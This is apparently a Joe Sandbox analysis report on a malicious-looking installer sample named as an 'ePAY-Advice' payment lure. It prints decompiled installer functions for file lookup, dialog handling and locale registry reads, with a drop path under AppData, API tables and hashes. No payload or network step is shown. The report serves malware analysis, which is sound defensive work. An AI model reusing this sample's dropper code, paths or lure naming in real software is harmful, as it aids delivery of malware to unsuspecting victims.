0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00000000
0x00406df4
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406895
0x00406899
0x004068b7
0x004068ba
0x004068c1
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d0
0x004068d2
0x004068d9
0x004068da
0x004068dc
0x004068df
0x004068e2
0x004068e5
0x004068e5
0x004068ea
0x00000000
0x004068ea
0x0040689b
0x0040689e
0x004068a1
0x004068ab
0x00000000
0x00000000
0x004068ff
0x00406903
0x00406926
0x00406929
0x0040692c
0x00406936
0x00406905
0x00406905
0x00406908
0x0040690b
0x0040690e
0x0040691b
0x0040691e
0x0040691e
0x00000000
0x00000000
0x00406942
0x00406946
0x00000000
0x00000000
0x0040694c
0x00406950
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695c
0x0040695c
0x0040695f
0x00406963
0x00000000
0x00000000
0x004069b3
0x004069b7
0x004069be
0x004069c1
0x004069c4
0x004069ce
0x00000000
0x004069ce
0x004069b9
0x00000000
0x00000000
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x004069f4
0x004069f4
0x004069f7
0x004069fa
0x004069fd
0x004069fd
0x00406a00
0x00406a07
0x00406a0c
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x004068ed
0x004068ed
0x004068f0
0x00000000
0x00000000
0x00406c2c
0x00406c30
0x00406c52
0x00406c55
0x00406c5f
0x00000000
0x00406c5f
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3c
0x00406c3f
0x00000000
0x00000000
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00406d20
0x00406d20
0x00000000
0x00406d20
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00000000
0x00000000
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00406a2b
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a35
0x00406a36
0x00406a39
0x00406a40
0x00406a43
0x00406a51
0x00000000
0x00000000
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00000000
0x00406d36
0x00406d36
0x00406d3a
0x00406e72
0x00000000
0x00406e72
0x00406d40
0x00406d43
0x00406d46
0x00406d4a
0x00406d4d
0x00406d53
0x00406d55
0x00406d55
0x00406d55
0x00406d58
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5e
0x00406d5e
0x00406d62
0x00406dc2
0x00406dc5
0x00406dca
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd2
0x00000000
0x00406dd2
0x00406d64
0x00406d6a
0x00406d6d
0x00406d70
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d82
0x00406d85
0x00406d9e
0x00406da1
0x00406da4
0x00406da7
0x00406dab
0x00406dad
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d8f
0x00406d94
0x00406d96
0x00406d99
0x00406d99
0x00406db4
0x00406dbb
0x00000000
0x00406dbd
0x00000000
0x00406dbd
0x00000000
0x00406a59
0x00406a5c
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406966
0x00406966
0x0040696a
0x00406e30
0x00000000
0x00406e30
0x00406970
0x00406973
0x00406976
0x00406979
0x0040697b
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x00000000
0x00406c27
0x00406c25
0x00406e5a
0x00000000
0x00000000
0x00406489

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
Instruction ID: 5cdea38fe39661480990cc8a004f6d9d9bf1a0cca829e9caf547f016d39c1b54
Opcode Fuzzy Hash: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
Instruction Fuzzy Hash: 7BF17475D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040626D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040626D(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x421558); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x421558;
			}

0x00406278
0x00406281
0x00000000
0x0040628e
0x00406284
0x00000000

APIs

FindFirstFileA.KERNELBASE(766DFA90,00421558,C:\Users\user\AppData\Local\Temp\nslD140.tmp,00405A33,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,766DFA90,?,C:\Users\user\AppData\Local\Temp\,00405752,?,766DFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406278
FindClose.KERNEL32(00000000), ref: 00406284

Strings

C:\Users\user\AppData\Local\Temp\nslD140.tmp, xrefs: 0040626D

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nslD140.tmp
API String ID: 2295610775-706521243
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 4b5b4fac396428ba6811cbdb79132df6df7f7590a8a38978907140e3512fee8b
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 9AD012319190246BC3402B387D0C84B7B599B553317128B77F96BF16F0C3389C7286EA

Uniqueness

Uniqueness Score: -1.00%

Function 00403B35 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403B35(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x41fcf0 = _t35;
					if(_t116 == 0x110) {
						 *0x423708 = _t126;
						 *0x41fd04 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41ecd0 = _t92;
						E00404009(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x422ee8); // executed
						 *0x422ecc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x41fcf0 = 1;
					}
					_t123 =  *0x4091dc; // 0x0
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x423740;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E00404055(0x40b);
						while(1) {
							_t37 =  *0x41fcf0;
							 *0x4091dc =  *0x4091dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x4091dc; // 0x0
							__eflags = _t39 -  *0x423744;
							if(_t39 ==  *0x423744) {
								E0040140B(1);
							}
							__eflags =  *0x422ecc - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x4091dc -  *0x423744; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00405F8C(_t117, _t126, _t131, 0x42b800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E00404009(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E00404009(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E00404009(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4237ac - _t134;
							_v32 = _t49;
							if( *0x4237ac != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
							E0040402B(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41ecd0, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4237ac - _t134;
							if( *0x4237ac == _t134) {
								_push( *0x41fd04);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41ecd0);
							}
							E0040403E();
							E00405F6A(0x41fd08, E00403B16());
							E00405F8C(0x41fd08, _t126, _t131,  &(0x41fd08[lstrlenA(0x41fd08)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x41fd08); // executed
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x422ed8); // executed
									 *0x41f4e0 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x423700,  *_t131 +  *0x422ee0 & 0x0000ffff, _t126,  *( *(_t131 + 4) * 4 + "tA@"), _t131); // executed
									__eflags = _t74 - _t134;
									 *0x422ed8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E00404009(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x422ed8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x422ecc - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x422ed8, 8);
									E00404055(0x405);
									goto L58;
								}
								__eflags =  *0x4237ac - _t134;
								if( *0x4237ac != _t134) {
									goto L61;
								}
								__eflags =  *0x4237a0 - _t134;
								if( *0x4237a0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x422ed8);
						 *0x423708 = _t134;
						EndDialog(_t126,  *0x41f0d8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x422ed8, 0x40f, 0, 1);
						__eflags =  *0x422ecc - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x41fce8, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x41fce8,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404070(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x422ed8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4237ac - _t134;
										if( *0x4237ac == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x41f0d8 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FE2();
											goto L26;
										}
										E0040140B(_t128);
										 *0x41f0d8 = _t128;
										goto L21;
									}
									__eflags =  *0x4091dc - _t134; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x422ed8);
						 *0x422ed8 = _a12;
						L58:
						if( *0x420d08 == _t134) {
							_t143 =  *0x422ed8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x420d08 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403b3e
0x00403b47
0x00403c88
0x00403c8c
0x00403c90
0x00403c92
0x00403c97
0x00403ca2
0x00403cad
0x00403cb2
0x00403cb4
0x00403cb6
0x00403cb9
0x00403cbe
0x00403ccc
0x00403cd9
0x00403ce0
0x00403ce0
0x00403ce1
0x00403ce1
0x00403ce6
0x00403cec
0x00403cf3
0x00403cf9
0x00403cfb
0x00403d3b
0x00403d40
0x00403d45
0x00403d45
0x00403d4a
0x00403d53
0x00403d55
0x00403d5a
0x00403d60
0x00403d64
0x00403d64
0x00403d69
0x00403d6f
0x00000000
0x00000000
0x00403d7a
0x00403d80
0x00000000
0x00000000
0x00403d89
0x00403d91
0x00403d96
0x00403d99
0x00403d9f
0x00403da4
0x00403da7
0x00403dad
0x00403db2
0x00403db5
0x00403dbb
0x00403dc3
0x00403dc9
0x00403dcf
0x00403dd3
0x00403dda
0x00403dda
0x00403dda
0x00403de4
0x00403df6
0x00403e02
0x00403e07
0x00403e11
0x00403e17
0x00403e19
0x00403e1e
0x00403e1b
0x00403e1b
0x00403e1b
0x00403e2e
0x00403e46
0x00403e48
0x00403e4e
0x00403e63
0x00403e50
0x00403e59
0x00403e5b
0x00403e5b
0x00403e69
0x00403e7a
0x00403e8b
0x00403e92
0x00403e98
0x00403e9c
0x00403ea1
0x00403ea3
0x00000000
0x00403ea9
0x00403ea9
0x00403eab
0x00000000
0x00000000
0x00403eb1
0x00403eb5
0x00403eda
0x00403ee0
0x00403ee6
0x00403ee8
0x00000000
0x00000000
0x00403f0e
0x00403f14
0x00403f16
0x00403f1b
0x00000000
0x00000000
0x00403f21
0x00403f24
0x00403f27
0x00403f3e
0x00403f4a
0x00403f63
0x00403f69
0x00403f6d
0x00403f72
0x00403f78
0x00000000
0x00000000
0x00403f82
0x00403f8d
0x00000000
0x00403f8d
0x00403eb7
0x00403ebd
0x00000000
0x00000000
0x00403ec3
0x00403ec9
0x00000000
0x00000000
0x00000000
0x00403ecf
0x00403ea3
0x00403f9a
0x00403fa6
0x00403fad
0x00000000
0x00403cfd
0x00403cfd
0x00403d00
0x00403d33
0x00403d33
0x00403d35
0x00000000
0x00000000
0x00000000
0x00403d35
0x00403d02
0x00403d06
0x00403d0b
0x00403d0d
0x00000000
0x00000000
0x00403d1d
0x00403d25
0x00000000
0x00403d2b
0x00403b59
0x00403b59
0x00403b5d
0x00403b62
0x00403b71
0x00403b71
0x00403b7a
0x00403b83
0x00403b8e
0x00403b8e
0x00403b9a
0x00403bb6
0x00403bb9
0x00403bcc
0x00403bd2
0x00403c75
0x00000000
0x00403c7e
0x00403bd8
0x00403be5
0x00403be7
0x00403be9
0x00403c08
0x00403c08
0x00403c0b
0x00403c10
0x00403c13
0x00403c23
0x00403c24
0x00403c26
0x00403c5c
0x00403c6f
0x00000000
0x00403c6f
0x00403c28
0x00403c2e
0x00403c47
0x00403c4c
0x00403c4e
0x00000000
0x00000000
0x00403c50
0x00403c3c
0x00403c3c
0x00403c3e
0x00403c3e
0x00000000
0x00403c3e
0x00403c31
0x00403c36
0x00000000
0x00403c36
0x00403c15
0x00403c1b
0x00000000
0x00000000
0x00403c1d
0x00000000
0x00403c1d
0x00403c0d
0x00000000
0x00403c0d
0x00403bf3
0x00403bfa
0x00403c00
0x00403c02
0x00000000
0x00000000
0x00000000
0x00403c02
0x00403bbe
0x00000000
0x00403b9c
0x00403ba2
0x00403bac
0x00403fb3
0x00403fb9
0x00403fbb
0x00403fc1
0x00403fc6
0x00403fcc
0x00403fcc
0x00403fc1
0x00403fd6
0x00000000
0x00403fd6
0x00403b9a

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B71
ShowWindow.USER32(?), ref: 00403B8E
DestroyWindow.USER32 ref: 00403BA2
SetWindowLongA.USER32 ref: 00403BBE
GetDlgItem.USER32 ref: 00403BDF
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BF3
IsWindowEnabled.USER32(00000000), ref: 00403BFA
GetDlgItem.USER32 ref: 00403CA8
GetDlgItem.USER32 ref: 00403CB2
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403CCC
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D1D
GetDlgItem.USER32 ref: 00403DC3
ShowWindow.USER32(00000000,?), ref: 00403DE4
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DF6
EnableWindow.USER32(?,?), ref: 00403E11
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E27
EnableMenuItem.USER32 ref: 00403E2E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E46
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E59
lstrlenA.KERNEL32(0041FD08,?,0041FD08,00000000), ref: 00403E83
SetWindowTextA.USER32(?,0041FD08), ref: 00403E92
ShowWindow.USER32(?,0000000A), ref: 00403FC6

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
String ID:
API String ID: 3906175533-0
Opcode ID: 0c1a0b4012b528e3d1e15867ad5d8e725077cdc308248a61195f66e94d999680
Instruction ID: ece9219a4d70184b68c45d6c06b8272552e5c94251c83fd0e936414de4f8c744
Opcode Fuzzy Hash: 0c1a0b4012b528e3d1e15867ad5d8e725077cdc308248a61195f66e94d999680
Instruction Fuzzy Hash: 7AC1C0B1A04205BBDB206F61EE48E2B3E7DFB45706F40453EF601B11E1C779A9429B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403798 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403798(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x423714;
				_t17 = E00406302(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x41fd08;
					"1033" = 0x30;
					 *0x42a001 = 0x78;
					 *0x42a002 = 0;
					E00405E51(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x41fd08, 0);
					__eflags =  *0x41fd08;
					if(__eflags == 0) {
						E00405E51(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040735A, 0x41fd08, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00405EC8("1033", _t67 & 0x0000ffff);
				}
				E00403A5D(_t71, _t84);
				_t80 = "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr";
				 *0x4237a0 =  *0x42371c & 0x00000020;
				 *0x4237bc = 0x10000;
				if(E004059F0(_t84, "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr") != 0) {
					L16:
					if(E004059F0(_t92, _t80) == 0) {
						E00405F8C(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x423700, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x422ee8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403A5D(_t71, __eflags);
							__eflags =  *0x4237c0;
							if( *0x4237c0 != 0) {
								_t28 = E00405163(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x422ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x41fce8, 5); // executed
							_t34 = E00406294("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E00406294("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x422ea0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x422ea0);
								 *0x422ec4 = _t81;
								RegisterClassA(0x422ea0);
							}
							_t36 =  *0x422ee0; // 0x0
							_t39 = DialogBoxParamA( *0x423700, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B35, 0); // executed
							E004036E8(E0040140B(5), 1);
							return _t39;
						}
